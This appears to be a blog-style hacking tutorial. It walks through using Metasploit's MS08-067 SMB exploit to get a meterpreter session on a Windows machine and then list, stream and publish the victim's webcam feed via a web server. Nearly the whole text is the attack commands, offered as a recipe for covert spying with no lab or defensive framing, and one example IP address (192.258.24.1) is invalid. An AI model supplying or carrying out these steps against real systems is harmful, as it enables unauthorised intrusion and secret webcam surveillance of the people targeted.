1) Backtrack 5r3 or Kali Linux or Parrot Sec OS:
2)
Metasploit, you will need this which is important actually it's
pre-installed in backtrack but some of you don't have it in your
backtrack so you can download them from here
Ok so now let's begin,
- Open terminal and type:
msfconsole
- Next set our exploit:
use exploit/windows/smb/ms08_067_netapi
- Set payload and use meterpreter
- Set RHOST (target ip)
set RHOST (your target adress)
e.g set RHOST 192.258.24.1
Set LHOST (us)
set LHOST 192.155.0.150
- Now type:
exploit
- now show what webcam use:
webcam_list
e.g he use Logitech webcam C160
webcam_stream
- Show time
run webcam -p /var/www
starting webcam...
starting webcam...
- Open Your Browser and Go To :
Comments
Post a Comment